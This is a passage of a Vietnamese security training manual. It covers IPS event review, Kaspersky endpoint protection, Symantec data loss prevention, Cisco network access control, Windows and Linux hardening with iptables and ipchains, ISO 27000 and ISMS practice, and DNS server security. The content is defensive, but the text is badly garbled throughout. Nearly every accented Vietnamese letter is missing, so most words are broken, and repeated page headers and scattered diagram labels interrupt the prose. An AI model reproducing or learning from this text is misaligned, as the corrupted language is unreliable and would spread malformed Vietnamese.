Thng tin qun tr cc ng dng trong h thng

j. Phn tch Event v IPS Intrusion Event c thit k v thc hin chi tit ti ti liu thit k Report. Intrusion Event lin quan ton b cc Event v IPS, ngi qun tr c th kim tra theo di s lng Event theo: + Theo thi gian + Theo Detection Engine + C th lc theo nhiu la chn khc nhau

Page | 143 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Page | 144 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Ngi qun tr c th lc cc Event cn thit

Page | 145 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Page | 146 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

12. Endpoint Security a. Gii php Kaspersky Open Space Security (KOSS) M hnh ca gii php Kaspersky Open Space Security

Kaspersky for mail Server

Kaspersky Interne Gatewa Endpoint Security for File Server

Endpoint Security for Workstation


Gii php KOSS s dng cng c Kaspersky Security Central qun l tp trung ton b cc gi bo mt trong gii php. KSC cho php qun l phn cp p ng vi mi m hnh mng:

Page | 147 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Kaspersky Security Center MASTER

Kaspersky Security Center SLAVE

Kaspersky Endpoint Security

b. Tnh nng ca gi Kaspersky Endpoint Security Gi Kaspersky Endpoint Security cho my trm my ch c cc tnh nng

Page | 148 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Control component:

Application Startup Control Application Privilege Control Vulnerabiltiy Monitor Device Control Web Control

Protection Component:

General Protection Settings File Anti-Virus Mail Anti-Virus Web Anti-Virus IM Anti-Virus System Watcher Firewall Network Attack Blocker

c. Lab ci t KSC v Endpoint Security cho my trm 13. Data Loss Prevent L gii php chng r r thng tin ni b bao gm mt lot cc gii php: Qun l ng dng Qun l thit b phn cng (USB, CD-ROM.) Qun l d liu M ha d liu Gim st v ghi nht k truy cp d liu

Di y ti trnh by mt gii php DLP ca Symantec: DLP ngy cng tr nn quan trng bi cc t chc ngy nay ang rt quan tm v tp trung xy dng cc bin php bo mt xung quanh thng tin quan trng ca h. gip cc khch hng bo v d liu nhy cm hiu qu hn, nn tng DLP m ca Symantec s gip h tn dng kh nng Page | 149 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

nhn bit theo ni dung ca vic trin khai h thng bo mt cho doanh nghip trn din rng, ng thi tin hnh nhng bc quan trng bo mt cng nh ngn chn mt mt d liu . Symantec Data Loss Prevention 10 s cho php doanh nghip ng dng c ch m ha v qun l phn quyn doanh nghip (ERM - Enterprise rights management) da trn ni dung, ng thi tch hp d dng vi cc gii php khc ca Symantec. ng dng m ha v ERM theo ni dung Tnh nng mi FlexResponse ca Symantec Data Loss Prevention 10 s gip nhm bo mt ca doanh nghip p dng nhng c ch bo mt theo chnh sch i vi cc tp tin c cha d liu quan trng, bao gm m ha hay ERM. Hin nay, vic kt hp gia DLP vi cc gii php CNTT khc ang phi thc hin bng tay. Nh hp tc vi cc nh cung cp th 3 hng u khc, nh GigaTrust, Liquid Machines, Oracle v PGP Corporation, Symantec s mang n cho cc khch hng s a dng v cc la chn gii php bo v tch hp. V d, mt cng ty hin ch cho php mt s t ngi c truy cp thng tin v tha thun st nhp cng ty s d dng p dng chnh sch DLP ca h phn loi d liu, ng thi s dng Microsoft Active Directory Rights Management Services (ADRMS - Dch v qun l phn quyn th mc ng ca Microsoft) p dng ERM i vi nhng bn sao lu ca d liu ny, mang li mt c ch bo v mn rt hiu qu. Tng cng kh dng ca Tnh thng minh DLP Nhng h tr mi nht i vi XML v Dch v web s cho php gii php Symantec Data Loss Prevention 10 gi nhng d liu DLP ti mi ng dng hoc h thng bo co, bao gm c cc bng iu khin bo mt doanh nghip hay cc gii php v tun th, nh b gii php kim sot tun th Symantec Control Compliance Suite. V d, mt trang thng mi in t c th khi u bng cch dng DLP xc nh my ch c nhng d liu chu s iu chnh ca cc iu lut PCI DSS. Nh gi thng tin ny ti cng c Control Compliance Suite ca Symantec, th nhng my ch s c u tin kim tra thng xuyn hn, theo c c s kim sot k lng i vi nhng khu vc lu tr d liu quan trng. Nhng tnh nng import/export mi (np/xut chnh sch) s cho php cc t chc m bo chnh sch ca h c cp nht thng xuyn quy nh mi, ng thi lin kt v trao i cc chnh sch vi nhiu ngi dng khc nhm chia s kinh nghim thc tin tt nht. Page | 150 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Tch hp thng sut vi nhng gii php khc ca Symantec Vic tch hp mi vi Symantec Workflow s cho php ngi dng DLP 10 thc thi nhng tc v theo chnh sch nh kha thit b u cui, m ha t ng vi gii php Symantec Endpoit Encryption, Symantec Endpoint Protection v cc gii php bo mt khc ca Symantec cng nh ca cc nh cung cp khc. V d, nu mt nhn vin mun ti thng tin mt v USB, gii php Symantec Data Loss Prevention c th truyn tin cho Symantec Endpoint Protection kha cng USB ch vi mt tc v n gin. Nhng ngi dng gii php bo mt email SaaS (Software-as-a-service - phn mm l dch v) nh MessageLabs Hosted Email Encryption (mt dch v lu k ca Symantec) cng c th gim st, bo v v truyn dn nhng thng tin mt mt cch bo mt, an ton vi email gi ra ngoi m khng cn phi c mt h tng cng dch v email trc tip. Dch v, ngn ng v s sn sng trn th trng Cc dch v Symantec Data Loss Prevention gip khch hng c c thnh cng r rng nh trin khai DLP, ng thi thu c nhng kin thc v kinh nghim cn thit tip tc ti u ha gii php ny qua thi gian. Nh kt hp vi nhng dch v t vn v nhng cng ngh chng mt mt d liu u ngnh khc, Symantec mang ti cho khch hng kh nng phn tch chuyn su v nhng nguy c ri ro ca h i vi r r thng tin c bn trong v ngoi doanh nghip, cng nh kh nng nh gi nh lng v khi lng d liu thc t chuyn qua h thng mng, lu tr ng dng trn web v cc thit b u cui. Symantec Data Loss Prevention 10 cng c chnh sch v h tr tm kim vi 25 ngn ng khc nhau, ng thi c phin bn y ting Nht, Trung Quc ph thng v ting Php, theo nhng ngi dng s dng nhng ngn ng ny c th t to lp chnh sch, qun l v x l s c, ng thi thc thi qun l h thng mt cch ton din nht. 14. Network Access Control m bo ngi dng truy cp vo h thng mng khng tm cch tn cng cn phi c qu trnh kim tra, nh gi v a ra hng gii quyt. VD: Mt ngui khch n cng ty bn, truy cp vo mng Wifi mc nh ngi khch s khng th vo trong mng ni b c. truy cp vo mng ni b cn phi qua mt lot bc

Page | 151 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

kim tra. 1. Ci t Agent kim tra my tnh c m bo tnh an ton hanh khng. 2. NAC gateway s a ra Policy quyt nh my tnh c c truy cp vo nhng vng no. y ti trnh by mt bi vit v Cisco NAC, cc h thng khc hot ng tng t: Cisco NAC l mt cch trin khai Network Admission Control mt cch n gin, c s dng cho cu trc mng m bo cc chnh sch bo mt c p dng cho ton b cc thit b truy cp vo cc ti nguyn mng. Vi NAC, cc nh qun tr c th xc thc, u quyn, v nh gi, da trn cc kt ni s dng dy hay wireless, cc ngi dng truy cp t xa. N nhn din c cc thit b nh laptops, IP phones, hay cc my chi game, vi cc chnh sch bo mt v ngn chn cc nguy c tim n trong qu trnh truy cp d liu ca ngi dng Tc dng ca Network Admission Control D liu trong h thng mng b nhim virus hin nay l mt vn cn c quan tm mt cch thch ng, cc loi virus ngy cng c nh hng ln i vi h thng. Ti nguyn c s dng c bo m khng b nhim virus l mt yu cu v cn phi c thc hin, vi tnh nng chng virus hiu qu Network Admission Control l mt gii php. Cisco NAC gip m bo tnh trng ca cc my client trc khi truy cp vo mng. NAC lm vic vi mt chng trnh Anti-Virus to ra cc iu kin, cc chnh sch thit lp c cung cp cho cc my client trc khi chng truy cp vo cc ti nguyn mng. NAC m bo cc my client trong mng lun lun c cp nht cc bn nng cp cho phn mm dit virus mt cch tt nht. Nu client c mt yu cu cp nht bn nng cp, gii php NAC s mang n kh nng cung cp cp nht trc tip cho qu trnh cp nht t cc my client. Nu client c s xut hin t ngt virus c th gy ra nh hng i vi ton mng, NAC s chuyn my client n mt vng mng c cch ly hon ton cho n khi qu my client c kim tra mt cch k lng v m bo khng cn virus cng nh nhng kh nng nguy hai cho h thng mng. Cch lm vic ca Network Admission Control. Vic trin khai ng dng NAC c tch hp t nhiu giao thc hin nay thng s dng v cc sn phm ca Cisco vi mt vi sn phm v cc tnh nng nh: Cisco Trust Agent (CTA) and plug-ins Cisco IOS Network Access Device (NAD) Extensible Authentication Protocol (EAP) Cisco Secure Access Control Server (ACS)/Remote Authentication Dial-In User Service (RADIUS) Posture validation/remediation server Page | 152 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

CTA giao tip vi cc phn mm khc trn my client qua Application Program Interface (API) v tr li v tnh trng ca mnh t cc yu cu ca NAD. CTA l yu cu cn thit giao tip trong qu trnh trin khai NAC (CTA giao tip vi NAC s dng EAP qua giao thc UDP). Mt phn mm bao gm mt Posture Plug-In (PP) to nn giao din cho CTA. PP l mt tc nhn c thc hin trn mt phn mm t cc nh sn xut khc c tc dng thc hin cc chnh sch v trng thi ca phn mm . Hin ti vic trin khai NAC th NAD l phn mm Layer 3 Cisco IOS trong cc thit b dng truy vn cc my client tm kim v kim sot tnh hnh s dng EAP qua giao thc UDP (EAP over UDP - EOU). Phng php ny khc vi cc thnh phn ca gii php NAC c th hin hnh di y:

Hnh: hin th cch NAC vi cc thnh phn lm vic vi nhau: 1. Client gi mt gi tin ti mt NAC-enabled router.

thc

NAC

lm

vic

2. NAD bt u c thc hin ph chun qu trnh vi vic s dng EOU. 3. Client gi mt thng ip vi kh nng xc thc m bo c s ph chun ca NAD s dng EOU ti NAD. 4. NAD gi thng ip ti Cisco ACS s dng giao thc xc thc RADIUS. 5. Cisco Secure ACS yu cu c s ph chun c s dng qua giao thc Host Credential Authorization Protocol (HCAP) trong mt HTTPS tunnel. 6. Thng ip t my ch c gi i tr li cho yu cu l: pass, fail, quarantine. 7. cho php hay cm truy cp vo mng, Cisco Secure ACS gi mt thng ip ng vi ACLs/URL. 8. NAD chuyn thng ip cho client. Page | 153 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

9. Client s c php truy cp hay b cm truy cp. Khi mt client gi mt yu cu truy cp vo mng (1),NAD c thc hin chuyn thng ip "yu cu cn c ph chun" (2). Sau c gi n CTA sau khi nhn c s chuyn n Cisco Secure ACS, v sau mt phin Protect EAP (PEAP) c thc hin t CTA sau gi kim tra t cch ca client xem c ng tin cy hay khng c thc hin t PPs trn m y client ti NAD (3), chng c chuyn n Cisco Secure ACS qua giao thc RADIUS (4). Vic thm nh xem client c ng tin cy khng bng cch ly cc thng tin v trng thi ca phn mm c ci trn my client. Cisco Secure ACS kim tra v thm nh kh nng tin tng bng cch kim tra trng thi ca client vi cc chnh sch c to ra trong c s d liu ca n. Cisco Secure ACS cng c th cu hnh chuyn yu cu thm nh n mt my ch khc cho vic thm nh (5). Qu trnh lm vic s dng HCAP trn mt HTTPS tunnel. N c th l mt tu chn trong phn mm ca client vi mt PP v mt my ch dng thm nh v tnh trng ca my client. Khi mt my ch bn ngoi dng vo vic thm nh tnh xc thc cho qu trnh ng nhp ca my client sau s gi thng ip thm nh ti Cisco Secure ACS. Cisco ACS sau tng hp ton b cc chnh sch ti v cc chnh sch c kim tra trn my ch sau tr li thng tin c tng hp cho Client. Cisco Secure ACS sau gi thng tin Access Control List (ACL) cho NAD cung cp cc chnh sch cho client (8). 15. Bo mt h iu hnh a. Bo mt cho h iu hnh Windows S dng phn cng an ton Hin nay c rt nhiu phn cng nh RAM, USB, Keylogger, HDD cho php n trm d liu ca ngi dng, vic la chn phn cng chnh hng c xut s r rng l v cng quan trng cho mi nn tng. S dng Windows c bn quyn S dng h iu hnh Windows c bn quyn cho php cp nht cc bn v li v nhn c s h tr trc tip t hng s lm cho h thng ca bn an ton hn. Thit lp t ng Upgrade Nn thit lp t ng Upgrade c th v cc l hng bo mt Thit lp tng la cho my tnh

Page | 154 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Tng la trn my tnh cho php bo v my tnh trc cc mi him ha nh tn cng l hng bo mt, bng n ca wormChng ta nn bt tnh nng tng la v thit lp ch nhng ng dng v port no chng ta bit th mi m. Lab: thit lp tng la cho my my tnh Thit lp mt khu kh vi cc User. Ngi dng c thi quen t mt khu n gin i khi cng l con ng tn cng khai thc ca cc ti phm mng. Cn thit lp Password ca vWindows ti thiu l 7 k t bao gm: S, ch Hoa, ch thng, k t c bit. Lab: Thit lp User Account Policy cho my tnh M ha cng vi tnh nng Bitlocked ca Microsoft H iu hnh vWindows t Vista tr nn cho php bn m ha ton b cng, iu ny gip bn trnh tht thot d liu khi b mt my tnh, v chng c b kha my tinh. Ch ci t cc phn mm c xut x r rng Tt tt c cc dch v v ng dng khng cn thit iu ny cng gip bn gim thiu kh nhiu cc nguy c b tn cng vo my tnh Ci t cc chng trnh bo v (Endpoint Security) Cc chng trnh bo v nh Kaspersky, Symantec, Trend gip bn gim st ton b h thng my tnh t cc qu trnh I/O, c ghi d liu, hay cc truy cp mng. Hu ht cc nguy c i vi h thng Endpoint s c pht hin bi cc phn mm ny. S dng cc dch v mng an ton Vic trao i thng tin bng cc giao thc thiu an ton nh telnet, pop3, smtp, ftp, http s dn ti vic Username/Password ca bn s b mt. Vic la chn cc giao tip mng an ton cng l iu v cng quan trng bo v h thng my tnh. Thit lp IPsec cho cc dch v mng thiu an ton. Khi s dng cc dch v thiu an ton khi thng tin truyn trn mng, bn hon ton c th s dng tnh nng Ipsec m ha thng tin truyn trn mng. Ipsec m bo d liu ca bn s lun c an ton To Group Policy trn ton Domain m bo thng nht chnh sch s dng Page | 155 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

S dng My tnh trong mi trng an ton Thi quen truy cp Internet an ton v c y cc gii php bo v. b. Lab: S dng Ipsec Policy bo v mt s ng dng trn Windows c. Bo v cho h iu hnh Linux S dng phin bn Linux c phn phi bi mt t chc uy tn nh Red Hat, Ubuntu v mt vi nh phn phi khc. S dng nhn Linux phin bn mi nht Khi trin khai ci t dch v mi cn kim tra dch v c nhng l hng g c th xy ra. S dng cc phn mm bo mt khc ci t trn my tnh Linux (Anti-Virus, IDS/IPS, Firewall). Sau y ti trnh by s lc v s dng Iptable bo v my tnh Linux Firewall IPtable trn Redhat Phin bn nhn Linux version 2.2.x c a ra vi rt nhiu tnh nng mi gip Linux hot ng tin cy hn v h tr cho nhiu thit b. Mt trong nhng tnh nng mi ca n l h tr Netfilter iptables ngay trong kernel, gip thao tc trn packet hiu qu hn so vi cc ng dng trc nh ipfwadm trong kernel 2.0 v ipchains trong kernel 2.2, tuy vn h tr cho cc b lnh c. Thit lp firewall theo kiu lc packet (packet filtering lc gi thng tin) vi ipfwadm hoc ipchains c nhiu hn ch: thiu cc tch hp cn thit m rng tnh nng, khi s dng lc packet cho cc giao thc thng thng v chuyn i a ch mng (Network Address Translation - NAT) th thc hin hon ton tch bit m khng c c tnh kt hp. Netfilter v iptables trn kernel 2.4 gii quyt tt cc hn ch trn v c thm nhiu tnh nng khc m Ipfwadm v Ipchains khng c. Gii thiu v IPtables Trong h thng Linux c rt nhiu firewall. Trong c mt s firewall c cu hnh v hot ng trn nn console rt nh v tin dng l Iptable v Ipchain. Netfilter/IPtables Gii thiu Iptables do Netfilter Organiztion vit ra tng tnh nng bo mt trn h thng Linux. Iptables l mt tng la ng dng lc gi d liu rt mnh, c sn bn trong kernel Li nux 2.2.x v 2.6.x. Netfilter/Iptable gm 2 phn l Netfilter trong nhn Linux v Iptables nm Page | 156 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

ngoi nhn. IpTables chu trch nhim giao tip gia ngi dng v Netfilter y cc lut ca ngi dng vo cho Netfilter x l. Netfilter tin hnh lc cc gi d liu mc IP. Netfilter lm vic trc tip trong nhn, nhanh v khng lm gim tc ca h thng. c thit k thay th cho linux 2.2.x Ipchains v linux 2.0.x ipfwadm v c nhiu c tnh hn Ipchains v n c xy dng hp l hn vi nhng im sau: Netfilter/Iptables c kh nng g? Xy dng bc tng la da trn c ch lc gi stateless v stateful Dng bng NAT v masquerading chia s s truy cp mng nu khng c a ch mng. Dng bng NAT ci t transparent proxy Gip cc h thng tc v iproute2 to cc chnh sch router phc tp v QoS. Lm cc thay i cc bit(mangling) TOS/DSCP/ECN ca IP header. C kh nng theo di s kt ni, c kh nng kim tra nhiu trng thi ca packet. N lm vic ny cho UDP v ICMP tt nht l kt ni TCP, v d tnh trng y ca lc ICMP ch cho php hi m khi c yu cu pht i, ch khng chn cc yu cu nhng vn chp nhn hi m vi gi s rng chng lun p li lnh ping. S hi m khng do yu cu c th l tn hiu ca s tn cng hocca sau. X s n gin ca cc packet tho thun trong cc chains (mt danh sch cc nguyn tc) INPUT, OUTPUT, FORWARD. Trn cc host c nhiu giao din mng, cc packet di chuyn gia cc giao din ch trn chain FORWARD hn l trn 3 chain. Phn bit r rng gia lc packet v NAT (Nework Address Translation) C kh nng gii hn tc kt ni v ghi nht k. Bn c th gii hn kt ni v ghi nht k t trnh s tn cng t chi dch v (Deinal of service).C kh nng lc trn cc c v a ch vt l ca TCP. L mt firewall c nhiu trng thi, nn n c th theo di trong sut s kt ni, do n an ton hn firewall c t trng thi.Iptables bao gm 4 bng, mi bng vi mt chnh sch (police) mc nh v cc nguyn tc trong chain xy dng sn. Ipchain Mt trong nhng phn mm m Linux s dng cu hnh bng NAT ca kernel l Ipchain. Bn trong chng trnh Ipchain c 2 trnh kch bn (scrip) chnh c s dng n gin ha cng tc qun tr Ipchains.Ipchain c dng ci t, duy tr v kim tra cc lut ca Ip firewall trong Linux kernel. Nhng lut ny c th chia lm nhm chui lut khc nhau l: Ip Input chain (chui lut p dng cho cc gi tin i n firewall). Ip Output chain (chui lut p dng cho cc gi tin c pht sinh cc b trn firewall v i ra khi firewall). Page | 157 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Ip forwarding chain (p dng cho cc gi tin c chuyn tip ti my hoc mng khc qua firewall). V cc chui lut do ngi dng nh ngha (user defined). Ipchains s dng khi nim chui lut (chain ) x l cc gi tin. Mt chui lut l mt danh sch cc lut dng x l cc gi tin c cng kiu l gi tin n, gi tin chuyn tip hay gi tin i ra.Nhng lut ny ch r hnh ng no c p dng cho gi tin. Cc lut c lu tr trong bng NAT l nhng cp a ch IP ch khng phi tng a ch IP ring l. Mt lut firewall ch ra cc tiu chun packet v ch n. Nu packet khng ng lut k tip s c xem xt, nu ng th lut k tip s ch nh r gi tr ca ch c th cc chain do ngi dng nh ngha hay c th l mt trong cc gi tr c th sau: ACCEPT, DENY, REJECT, MASQ REDICRECT hay RETURN.

Tng t nh DENY nhng c tr li cho client bit gi tin b hy b.

dng khi kernel c bin dch vi CONFIG_IP_MASQUERADE. Vi chain ny packet s c masquerade nh l n c sinh ra t my cc b, hn th na cc packet ngc s c nhn ra v chng s c demasqueraded mt cch t ng, b qua forwarding chain.

c dng khi Linux kernel c bin dch vi tham s CONFIG_IP_TRANSPARENT_PROXY c nh ngha. Vi iu ny packets s c chuyn ti socket cc b, thm ch chng c gi n host xa. Mt s c php hay c s dng: Ipchains [ADC] chain rule-specification [options] Ipchains [RI] chain rulenum rule-specification [options] Ipchains D chain rulenum [options] Ipchains [LFZNX] [chain] [options] Ipchains P chain target [options] Ipchains M [-L | -S] [options]

Page | 158 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

16. Chnh sch an ninh mng. a. Yu cu xy dng chnh sch an ninh mng. Nu Security cho h tng mng bao gm 4 mng: L thuyt v Security K nng tn cng K nng cu hnh phng th Lp chnh sch an ton thng tin

Xy dng chnh sch an ninh mng l bc hon thin mt mi trng lm vic v hot ng theo chun bo mt. Hin nay nc ta c rt nhiu n v ang xy dng chnh sch bo mt theo chun ISO 27001, s dng m hnh ISMS. b. Quy trnh tng quan xy dng chnh sch tng quan: Plan Xc nh mc tiu Xc nh v nh lng ri ro an ton thng tin Xc nh cc yu cu cn tun th Xy dng chnh sch Do Thit k h thng Trin khai cc chnh sch/bin php bo v h tng Ci t an ton h thng my ch Ci t an ton h thng my trm

Page | 159 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Ci t cc ng dng bo v an ton thng tin Check Kim tra v nh gi an ton thng tin Gim st v kim ton h thng trong qu trnh hot ng Act Duy tr h thng Nng cp nu cn thit Hnh v th hin vng xoy Plan-Do-Check-Act

c. H thng ISMS
M hnh h thng ISMS

Page | 160 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

d. ISO 27000 Series Khi nhc n ISMS ngi ta phi ni n b tiu chun ISO/IEC 27000 series ch khng phi l mt ring mt tiu chun no c th. B tiu chun 27000 c 21 tiu chun, nhng t tng chnh nm ISO/IEC27001 - ci tin lin tc. B tiu chun ISO 27000 bao gm * ISO/IEC 27000 ISMS Tng qut v t vng. * ISO/IEC 27001 ISMS Yu cu * ISO/IEC 27002 Chun mc thc hin ISMS * ISO/IEC 27003 Hng dn trin khai ISMS * ISO/IEC 27004 o lng ISM * ISO/IEC 27005 Qun l ri ro IS * ISO/IEC 27006 Yu cu v t chc nh gi v chng nhn ISMS * ISO/IEC 27011 Hng dn ISM cho t chc vin thng. Page | 161 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

* ISO 27799 - ISM trong y t s dng ISO/IEC 27002 * ISO/IEC 27007 - Hng dn nh gi ISMS * ISO/IEC 27008 - Hng dn cho chuyn gia nh gi v ISMS controls * ISO/IEC 27013 - Hng dn tch hp trin khai ISO/IEC 20000-1 v ISO/IEC 27001 * ISO/IEC 27014 - Khung qun l IS * ISO/IEC 27015 - Hng dn ISM cho ti chnh v bo him * ISO/IEC 27031 - Hng dn mc sn sng ICT cho BCM * ISO/IEC 27032 - Hng dn cybersecurity * ISO/IEC 27033 - IT network security * ISO/IEC 27034 - Hng dn application security * ISO/IEC 27035 - Qun l security incident. * ISO/IEC 27036 - Hng dn bo mt s dng trong outsourcing * ISO/IEC 27037 - Hng dn xc nh, thu thp v/hoc thu nhn v bo qun cc bng chng s. Trong s ri ny c mt s tiu chun khng c cp (v d ISO27012 cho egovernment) l do nguyn nhn cc tiu chun ny cha nh hnh, hoc cha iu kin nng cp ln thnh tiu chun do U ban k thut ca ISO v IEC quyt nh. Ngoi ra hai tiu chun 27033 v 27034 c cc tiu chun con tng ng hay cn gi l cc phn nh 27033-1, 27034-5. Lm ISMS bt u t u??? Lm ISMS phi bt u t vic hc t ng (ISO27000) s dng trong ISMS thng nht cch hiu, t duy, din t v trnh by. Trnh trng hp mt t b din gii thnh nhiu ngha lch lc. Tuy nhin, v l do thi gian, tin bc, v k c... kiu ngo m nhiu n v thng b qua bc ny. Cu tr li thng thng khi ngi t vn yu cu trin khai hc v t vng l: "Ci ny d, t c l c ri" nhng thc t khng my ai c. Hn na mc ch chnh khng phi l hiu t vng m cho ton b nhn vin c cch hiu ging nhau. Chnh v vy m khi lm ISMS cc n v thng b tht bi v c tnh hnh thc v quan im v cch hiu ca mi ngi, mi cp trong t chc l khc nhau. Nhng ngi mi vo cng khng Page | 162 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

c hc nn dn dn khi m turnover ca employee cao th cch t duy v nh hng khng cn c nh ban u. ISMS c cn chng nhn khng? V ti sao? ISMS khng cn phi chng nhn, khng c ch no trong b tiu chun quy nh phi chng nhn ISMS c. Vic chng nhn ISMS l t nguyn. Nhiu n v a ra chng ch ISMS "h" ngi khc, nhng thc t ngi nm r tiu chun th thy chuyn rt hi hc.V ISMS ch th hin cam kt ch khng th hin gi tr. Gi tr chng nhn ISMS nm u? ISMS nm uy tn ca t chc chng nhn v chuyn gia nh gi. Trong lnh vc ny, c nhiu chuyn gia nh gi c chuyn mn su cn km hn c nhn vin ca n v. Do 27006 27008 quy nh v vic nh gi. Cng v l do m nhng tp on cng ty ln khng cn chng nhn ISMS m h t nh gi nu bn thn h c nhng chuyn gia gii. Sau khi hc 27000 th lm g?? Thng thng khi auditor i nh gi thng da vo 27001. Nu trin khai ISMS ch i ph th ch cn tp trung vo 27001 l v cng chng cn hc 27000 lm g. Nu thc s trin khai th tp trung vo 27002: Risk assessment Security policy Organization of information security Asset management Human resources security Physical and environmental security Communications and operations management Access control Information systems acquisition,

development

and

maintenance

10. Information security incident management Business continuity management Compliance Trin khai 12 ci code of practice ca 27002 nh th no? Khi trin khai 27002 s phi bt u chu k lp i lp li ca 12 im ni trn tc l 12 im trn phi c xy dng i xy dng li.

Page | 163 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Vic xy dng ny da trn 27003: Introduction Scope Terms & Definitions Structure of this Standard 5. Obtaining Management Approval for Initiating the Project to Implement an ISMS 6. Defining ISMS Scope and ISMS Policy 7. Conducting Organization Analysis 8. Conducting Risk Assessment and Risk Treatment Planning 9. Designing the ISMS

Nhn b ngoi th y dng nh l ch l vn qun l, nhng trn thc t phn Oganization Analysis vn cn thiu cc mt xch quan trng trong b tiu chun v ISO/IEC ang xy dng. l l do khng t ngi lm tng ISMS ch thin v qun l. C nhn ti c mt thi gian sai lm trong chuyn ny.

IV.

AN TON NG DNG
1. Bo mt cho ng dng DNS H thng tn min (DNS) c s dng xc nh t tn my ch n nhng a ch IP trn Internet v trn mng c nhn nn tng TCP/IP. My ch DNS thng l mc tiu m tin tc khai thc v tn cng, tuy nhin bn cng c th bo mt cho nhng my ch ny bng mt s phng php sau: a. S dng DNS Forwarder

DNS Forwarder (Trnh chuyn tip) l mt my ch DNS thc hin truy vn DNS thay cho nhiu my ch DNS khc. DNS Forwarder c s dng g b nhng tc v ang x l khi nhng my ch DNS ang thc hin chuyn tip nhng truy vn ny sang Forwarder, v tng lu lng b nh m DNS trn DNS Forwarder.

Mt chc nng khc ca DNS Forwarder l

Page | 164 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

ngn cn my ch DNS chuyn tip yu cu trong khi tng tc vi nhng my ch DNS trn Internet. y l chc nng c bit quan trng v khi my ch DNS cha ti nguyn bn trong min DNS. Thay v cho php nhng my ch DNS ni b t thc hin gi li lnh v lin lc vi nhng my ch DNS khc, n cu hnh cho my ch DNS ni b s dng mt Forwader cho tt c cc min khng c phn quyn.

b. S dng my ch DNS lu tr.

My ch DNS lu tr l mt my ch DNS khng th phn quyn cho bt k min DNS no. N c cu hnh thc hin gi li lnh hay s dng mt Forwarder. Khi my ch ny nhn mt phn hi, n s lu kt qu v chuyn cu tr li n h thng gi truy vn DNS ti my ch DNS lu tr. Sau , my ch ny c th tp hp nhiu phn hi DNS gip gim ng k thi gian phn hi cho nhng my trm DNS ca my ch DNS lu tr.

Nhng my ch DNS lu tr c th ci thin bo mt cho cng ty khi c s dng nh mt Forwarder trong nhm cng c qun tr ca bn. Nhng my ch DNS ni b c th c ci t s dng my ch DNS lu tr nh trnh chuyn i ca chng, v my ch DNS lu tr thc hin gi li lnh thay cho nhng my ch DNS ni b. Vic s dng nhng my ch DNS lu tr nh nhng Forwarder c th ci thin bo mt bi v bn khng phi ph thuc vo nhng my ch DNS ca nh cung cp c s dng nh Forwarder khi bn khng tin tng vo ci t bo mt trn my ch DNS ca h. c. S dng DNS Advertiser

DNS Advertiser (Trnh qung co) l mt my ch DNS thc hin truy vn cho nhng min m DNS Advertiser c phn quyn. V d, nu bn lu tr ti nguyn cho domain.com v corp.com, my ch DNS cng cng s c cu hnh vi vng file DNS cho min domain.com v corp.com.

S khc bit gia DNS Advertiser vi my ch DNS cha vng file DNS l DNS Advertiser tr li nhng truy vn t tn min m n phn quyn. My ch DNS s khng gi li truy vn c gi ti nhng my ch khc. iu ny ngn cn ngi dng s dng my ch DNS cng x l nhiu tn min khc nhau, v lm tng kh nng bo mt bng cch gim bt nhng nguy c khi chy DNS Resolver cng cng (gy tn hi b nh m).

Page | 165 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

d. S dng DNS Resolver.

DNS Resolver (trnh x l) l mt my ch DNS c th gi li lnh x l tn cho nhng min khng c my ch DNS phn quyn. V d, bn c th s dng mt my ch DNS c phn quyn trong mng ni b cho min mng ni b internalcorp.com. Khi mt my trm trong mng s dng my ch DNS ny t tn quantrimang.com, my ch DNS s gi li lnh bng cch truy lc kt qu trn nhng my ch DNS khc.

S khc bit gia my ch DNS ny v DNS resolver l DNS Resolver c dng t tn cho my ch Internet. Resolver c th l mt my ch DNS lu tr khng c phn quyn cho bt k min DNS no. Admin c th ch cho php ngi dng ni b s dng DNS Resolver, hay ch cho php ngi dng ngoi s dng cung cp bo mt khi s dng mt my ch DNS bn ngoi ngoi tm kim sot ca admin, v c th cho php c ngi dng ni b v ngi dng ngoi truy cp vo DNS Resolver. e. Bo v b nh m DNS

nhim b nh m DNS l mt vn pht sinh chung. Hu ht my ch DNS c th lu tr kt qu truy vn DNS trc khi chuyn tip phn hi ti my ch gi truy vn. B nh m DNS c th ci thin ng k kh nng thc hin truy vn DNS. Nu b nh m my ch DNS b nhim vi nhiu mc nhp DNS o, ngi dng c th b chuyn tip ti nhng website c hi thay v nhng website d nh truy cp.

Hu ht my ch DNS c th c cu hnh chng nhim b nh m. V d. my ch DNS Windows Server 2003 c cu hnh mc nh chng nhim b nh m. Nu ang s dng my ch DNS Windows 2000, bn c th ci t chng nhim bng cch m hp thoi Properties trong my ch DNS, chn tab Advanced, sau nh du hp chn Prevent Cache Pollution v khi ng li my ch DNS. f. Bo mt kt ni bng DDNS

